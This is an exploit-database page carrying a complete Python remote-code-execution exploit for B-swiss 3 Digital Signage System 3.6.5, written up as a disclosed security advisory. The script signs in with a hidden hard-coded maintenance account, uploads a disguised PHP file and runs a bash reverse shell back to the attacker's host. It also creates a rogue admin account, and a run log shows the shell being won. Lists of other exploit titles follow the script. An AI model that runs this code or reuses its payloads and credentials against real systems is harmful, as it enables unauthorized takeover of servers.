Menu

Search for hundreds of thousands of exploits

"B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution"

Author

Exploit author

LiquidWorm

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-09-21

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution
# Date: 2020-08-27
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.b-swiss.com
# Version: <= 3.6.5
# CVE : N/A


#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution
#
#
# Vendor: B-Swiss SARL | b-tween Sarl
# Product web page: https://www.b-swiss.com
# Affected version: 3.6.5
#                   3.6.2
#                   3.6.1
#                   3.6.0
#                   3.5.80
#                   3.5.40
#                   3.5.20
#                   3.5.00
#                   3.2.00
#                   3.1.00
#
# Summary: Intelligent digital signage made easy. To go beyond the
# possibilities offered, b-swiss allows you to create the communication
# solution for your specific needs and your graphic charter. You benefit
# from our experience and know-how in the realization of your digital
# signage project.
#
# Desc: The application suffers from an "authenticated" arbitrary
# PHP code execution. The vulnerability is caused due to the improper
# verification of uploaded files in 'index.php' script thru the 'rec_poza'
# POST parameter. This can be exploited to execute arbitrary PHP code
# by uploading a malicious PHP script file that will be stored in
# '/usr/users' directory. Due to an undocumented and hidden "maintenance"
# account 'admin_m' which has the highest privileges in the application,
# an attacker can use these hard-coded credentials to authenticate and
# use the vulnerable image upload functionality to execute code on the
# server.
#
# ========================================================================================
# lqwrm@metalgear:~/prive$ python3 sign2.py 192.168.10.11 192.168.10.22 7777
# [*] Checking target...
# [*] Good to go!
# [*] Checking for previous attempts...
# [*] All good.
# [*] Getting backdoor session...
# [*] Got master backdoor cookie: 0c1617103c6f50107d09cb94b3eafeb2
# [*] Starting callback listener child thread
# [*] Starting handler on port 7777
# [*] Adding GUI credentials: test:123456
# [*] Executing and deleting stager file
# [*] Connection from 192.168.10.11:40080
# [*] You got shell!
# id ; uname -or
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# 4.15.0-20-generic GNU/Linux
# exit
# *** Connection closed by remote host ***
# [?] Want me to remove the GUI credentials? y
# [*] Removing...
# [*] t00t!
# lqwrm@metalgear:~/prive$ 
# ========================================================================================
#
# Tested on: Linux 5.3.0-46-generic x86_64
#            Linux 4.15.0-20-generic x86_64
#            Linux 4.9.78-xxxx-std-ipv6-64
#            Linux 4.7.0-040700-generic x86_64
#            Linux 4.2.0-27-generic x86_64
#            Linux 3.19.0-47-generic x86_64
#            Linux 2.6.32-5-amd64 x86_64
#            Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
#            macOS 10.13.5
#            Microsoft Windows 7 Business Edition SP1 i586
#            Apache/2.4.29 (Ubuntu)
#            Apache/2.4.18 (Ubuntu)
#            Apache/2.4.7 (Ubuntu)
#            Apache/2.2.22 (Win64)
#            Apache/2.4.18 (Ubuntu)
#            Apache/2.2.16 (Debian)
#            PHP/7.2.24-0ubuntu0.18.04.6
#            PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
#            PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
#            PHP/5.6.31
#            PHP/5.6.30-10+deb.sury.org~xenial+2
#            PHP/5.5.9-1ubuntu4.17
#            PHP/5.5.9-1ubuntu4.14
#            PHP/5.3.10
#            PHP/5.3.13
#            PHP/5.3.3-7+squeeze16
#            PHP/5.3.3-7+squeeze17
#            MySQL/5.5.49
#            MySQL/5.5.47
#            MySQL/5.5.40
#            MySQL/5.5.30
#            MySQL/5.1.66
#            MySQL/5.1.49
#            MySQL/5.0.77
#            MySQL/5.0.12-dev
#            MySQL/5.0.11-dev
#            MySQL/5.0.8-dev
#            phpMyAdmin/3.5.7
#            phpMyAdmin/3.4.10.1deb1
#            phpMyAdmin/3.4.7
#            phpMyAdmin/3.3.7deb7
#            WampServer 3.2.0
#            Acore Framework 2.0
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2020-5590
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5590.php
#
#
# 13.06.2020
#

from http.cookiejar import DefaultCookiePolicy# #yciloPeikooCtluafeD tropmi rajeikooc.ptth mofr
from http.cookiejar import CookieJar#         oOo         #raJeikooC tropmi rajeikooc.ptth mofr
from six.moves import input# #-----------------+-----------------# #tupni trompi sevom.xis morf
from time import sleep#      |              01 | 04              |      #peels trompi emit morf
import urllib.request#       |                 |              |  |       #tseuqer.billru tropmi
import urllib.parse#         |                 |              |  |         #esrap.billru tropmi
import telnetlib#            |                 |                 |            #biltenlet tropmi
import threading#            |  |              |                 |            #gnidaerht tropmi
import requests#             |  |              |                 |             #stseuqer tropmi
import socket#               |                 |    o            |               #tekcos tropmi
import sys,re#               |                 |                 |               #er,sys tropmi
##############               #-----------------+-----------------#               ##############
###############                               oOo                               ###############
################                               |                               ################
####################                           Y                           ####################
############################                   _                   ############################
###############################################################################################

class Sign:
    
    def __init__(self):
        self.username = b"\x61\x64\x6d\x69\x6e\x5f\x6d"
        self.altruser = b"\x62\x2d\x73\x77\x69\x73\x73"
        self.password = b"\x44\x50\x36\x25\x57\x33\x64"
        self.agent = "SignageBot/1.02"
        self.fileid = "251"
        self.payload = None
        self.answer = False
        self.params = None
        self.rhost = None
        self.lhost = None
        self.lport = None
        self.send = None

    def env(self):
        if len(sys.argv) != 4:
            self.usage()
        else:
            self.rhost = sys.argv[1]
            self.lhost = sys.argv[2]
            self.lport = int(sys.argv[3])
            if not "http" in self.rhost:
                self.rhost = "http://{}".format(self.rhost)

    def usage(self):
        self.roger()
        print("Usage: python3 {} <RHOST[:RPORT]> <LHOST> <LPORT>".format(sys.argv[0]))
        print("Example: python3 {} 192.168.10.11:80 192.168.10.22 7777\n".format(sys.argv[0]))
        exit(0)

    def roger(self):
        waddup = """
       ____________________
      /                    \\
      !      B-swiss 3     !
      !         RCE        !
      \____________________/
               !  !
               !  !
               L_ !
              / _)!
             / /__L
____________/ (____)
              (____)
____________  (____)
            \_(____)
               !  !
               !  !
               \__/  
        """
        print(waddup)

    def test(self):
        print("[*] Checking target...")
        try:
            r = requests.get(self.rhost)
            response = r.text
            if not "B-swiss" in response:
                print("[!] Not a b-swiss system")
                exit(0)
            if "B-swiss" in response:
                print("[*] Good to go!")
                next
            else:
                exit(-251)
        except Exception as e:
            print("[!] Ney ney: {msg}".format(msg=e))
            exit(-1)

    def login(self):
        token = ""
        cj = CookieJar()
        self.params = {"locator"  : "visitor.ProcessLogin",
                       "username" : self.username,
                       "password" : self.password,
                       "x"        : "0",
                       "y"        : "0"}

        damato = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
        damato.addheaders.pop()
        damato.addheaders.append(("User-Agent", self.agent))
        
        try:
            print("[*] Getting backdoor session...")
            damato.open(self.rhost + "/index.php", urllib.parse.urlencode(self.params).encode('utf-8'))
            for cookie in cj:
                token = cookie.value
                print("[*] Got master backdoor cookie: "+token)
        except urllib.request.URLError as e:
            print("[!] Connection error: {}".format(e.reason))

        return token

    def upload(self):
        j = "\r\n"
        self.cookies = {"PNU_RAD_LIB"     : self.rtoken}
        self.headers = {"Cache-Control"   : "max-age=0",
                        "Content-Type"    : "multipart/form-data; boundary=----j",
                        "User-Agent"      : self.agent,
                        "Accept-Encoding" : "gzip, deflate",
                        "Accept-Language" : "en-US,en;q=0.9",
                        "Connection"      : "close"}
    
        self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/"+self.lhost+"/"+str(self.lport)+" <&1;rm "+self.fileid+".php'\");"

        print("[*] Adding GUI credentials: test:123456")
        # rec_adminlevel values:
        # ----------------------
        # 100000 - "b-swiss Maintenance Admin" (Undocumented privilege)
        #      7 - "B-swiss admin" <---------------------------------------------------------------------------------------+
        #      8 - Other                                                                                                   |
        #                                                                                                                  |
        self.send  = "------j{}Content-Disposition: form-data; ".format(j)#                                                |
        self.send += "name=\"locator\"{}Users.Save{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#            |
        self.send += "name=\"page\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                             |
        self.send += "name=\"sort\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                             |
        self.send += "name=\"id\"{}{}{}------j\r\nContent-Disposition: form-data; ".format(j*2,self.fileid,j,j)#           |
        self.send += "name=\"ischildgrid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                      |
        self.send += "name=\"inpopup\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                          |
        self.send += "name=\"ongridpage\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                       |
        self.send += "name=\"rowid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                            |
        self.send += "name=\"preview_screenid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                 |
        self.send += "name=\"rec_firstname\"{}TestF{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#           |
        self.send += "name=\"rec_lastname\"{}TestL{}------j{}Content-Disposition: form-data; ".format(j*2,j,2)#            |
        self.send += "name=\"rec_email\"{}test@test.cc{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#        |
        self.send += "name=\"rec_username\"{}test{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#             |
        self.send += "name=\"rec_password\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#           |
        self.send += "name=\"rec_cpassword\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#          |
        self.send += "name=\"rec_adminlevel\"{}7{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#   <----------+
        self.send += "name=\"rec_status\"{}1{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_poza\"; filename=\"Blank.jpg.php\"{}Content-Type: application/octet-stream{}".format(j,j*2)
        self.send += self.payload+"{}------j{}Content-Disposition: form-data; ".format(j,j)
        self.send += "name=\"rec_poza_face\"{}C:\\fakepath\\Blank.jpg{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_language\"{}french-sw{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_languages[]\"{}2{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_can_change_password\"{}1{}------j--{}".format(j*2,j,j)
    
        requests.post(self.rhost+"/index.php", headers=self.headers, cookies=self.cookies, data=self.send)
        print("[*] Executing and deleting stager file")
        r = requests.get(self.rhost+"/usr/users/"+self.fileid+".php")
        sleep(1)

        self.answer = input("[?] Want me to remove the GUI credentials? ").strip()
        if self.answer[0] == "y" or self.answer[0] == "Y":
            print("[*] Removing...")
            requests.get(self.rhost+"/index.php?locator=Users.Delete&id="+self.fileid, headers=self.headers, cookies=self.cookies)
        if self.answer[0] == "n" or self.answer[0] == "N":
            print("[*] Cool!")
        print("[*] t00t!")
        exit(-1)

    def razmisluju(self):
        print("[*] Starting callback listener child thread")
        konac = threading.Thread(name="ZSL", target=self.phone)
        konac.start()
        sleep(1)
        self.upload()

    def fish(self):
        r = requests.get(self.rhost+"/usr/users/", verify=False, allow_redirects=False)
        response = r.text
        print("[*] Checking for previous attempts...")
        if not ".php" in response:
            print("[*] All good.")
        elif "251.php" in response:
            print("[!] Stager file \"{}.php\" still present on the server".format(self.fileid))

    def phone(self):
        telnetus = telnetlib.Telnet()
        print("[*] Starting handler on port {}".format(self.lport))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("0.0.0.0", self.lport))
        while True:
            try:
                s.settimeout(7)
                s.listen(1)
                conn, addr = s.accept()
                print("[*] Connection from {}:{}".format(addr[0], addr[1]))
                telnetus.sock = conn
            except socket.timeout as p:
                print("[!] No outgoing calls :( ({msg})".format(msg=p))
                print("[+] Check your port mappings or increase timeout")
                s.close()
                exit(0)
            break

        print("[*] You got shell!")
        telnetus.interact()
        conn.close()

    def main(self):
        self.env()
        self.test()
        self.fish()
        self.rtoken = self.login()
        self.razmisluju()

if __name__ == '__main__':
    Sign().main()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass" webapps hardware LiquidWorm
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation" webapps hardware LiquidWorm
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)" webapps hardware LiquidWorm
2020-10-27 "GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse" remote hardware LiquidWorm
2020-10-27 "Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root" remote hardware LiquidWorm
2020-10-27 "TDM Digital Signage PC Player 4.1 - Insecure File Permissions" local windows LiquidWorm
2020-10-26 "ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service" webapps hardware LiquidWorm
2020-10-26 "ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)" webapps hardware LiquidWorm
2020-10-26 "ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure" webapps hardware LiquidWorm
2020-10-26 "ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure" webapps hardware LiquidWorm
2020-10-07 "BACnet Test Server 1.01 - Remote Denial of Service (PoC)" dos windows LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Username Enumeration" webapps hardware LiquidWorm
2020-10-01 "BrightSign Digital Signage Diagnostic Web Server 8.2.26 - File Delete Path Traversal" webapps hardware LiquidWorm
2020-10-01 "Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow" remote hardware LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Database Backup Disclosure" webapps hardware LiquidWorm
2020-10-01 "BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated)" webapps hardware LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)" webapps multiple LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure" webapps multiple LiquidWorm
2020-09-21 "B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution" webapps multiple LiquidWorm
2020-09-14 "Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path" local windows LiquidWorm
2020-08-28 "Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation" webapps hardware LiquidWorm
2020-08-26 "Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal" webapps multiple LiquidWorm
2020-08-24 "Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass" webapps hardware LiquidWorm
2020-08-24 "Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure" webapps hardware LiquidWorm
2020-08-07 "All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected